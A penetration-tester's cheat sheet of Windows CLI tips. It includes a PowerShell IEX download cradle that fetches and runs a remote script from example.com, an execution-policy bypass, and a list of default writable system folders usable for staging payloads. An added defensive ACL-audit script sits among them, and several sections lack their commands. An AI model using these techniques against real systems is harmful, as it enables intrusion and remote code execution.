CLI Tips

Powershell

Load Powershell Module Over HTTP

Load Powershell Module Over HTTP:

IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1')

Bypass Powershell Execution Policy

If you don't bypass the execution policy, you won't be able to run external powershell scripts. Run Powershell with Execution Policy Bypass:

powershell.exe -ExecutionPolicy Bypass

Switch to 64-bit Powershell from 32-bit

If you're on a 64-bit machine and running a 32-bit Powershell, then some things might not work, such as autologon discovery.

  • Check in powershell:

    • [environment]::Is64BitOperatingSystem

    • [environment]::Is64BitProcess

  • Access 64-bit Powershell at:

    • C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe

    • This path exists for 32-bit applications even if you can't see it from a 64-bit process, because it is a virtual alias.

    • Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.

View Hidden Files

Running Powershell commands from CMD

You can do it like this, but you need to press enter to get the output.

Writable Folders

Default Writable Folders:

  • C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

  • C:\Windows\System32\spool\drivers\color

  • C:\Windows\Tasks

  • C:\Windows\tracing

  • C:\Windows\Temp

  • C:\Users\Public
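The folders above are worth auditing from the defensive side: if a low-privileged principal can write to them, anything that later loads or executes content from those paths can be tampered with. The following PowerShell snippet is an added example, not part of the original page; it walks the list, reads each folder's ACL with Get-Acl, and reports every Allow entry that grants a write-class right to Everyone, BUILTIN\Users, Authenticated Users or INTERACTIVE. It assumes it is run on a Windows host in a session permitted to read those ACLs.

```powershell
# Added example: audit the default writable folders listed on this page and
# report which low-privileged principals hold write-class rights on them.
# Assumes a Windows host and a session that can read the folders' ACLs.

$paths = @(
    'C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys',
    'C:\Windows\System32\spool\drivers\color',
    'C:\Windows\Tasks',
    'C:\Windows\tracing',
    'C:\Windows\Temp',
    'C:\Users\Public'
)

# Principals that a hardened host should not be granting write rights to.
$lowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these bits lets the holder create or change content in a directory.
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
               [System.Security.AccessControl.FileSystemRights]::CreateDirectories -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-LowPrivWriteAccess {
    param([string[]]$Path)
    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) {
            [pscustomobject]@{ Path = $p; Principal = $null; Rights = 'PATH NOT FOUND'; Inherited = $null }
            continue
        }
        $acl = Get-Acl -LiteralPath $p
        foreach ($ace in $acl.Access) {
            # Keep only Allow entries for a low-privileged identity with a write bit set.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.FileSystemRights -band $writeRights) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $p
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-LowPrivWriteAccess -Path $paths | Format-Table -AutoSize
```

Entries flagged as Inherited come from a parent directory's ACL, so the fix belongs there rather than on the folder itself.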

Transferring Files

HTTP Download

Start an HTTP server on your Linux machine:

Download a file over HTTP using curl (if it is available from PowerShell):

Download file using certutil:

FTP Upload

Start an FTP server on your Linux machine:

If you don't specify username and password, then you can log in with user anonymous and no password.
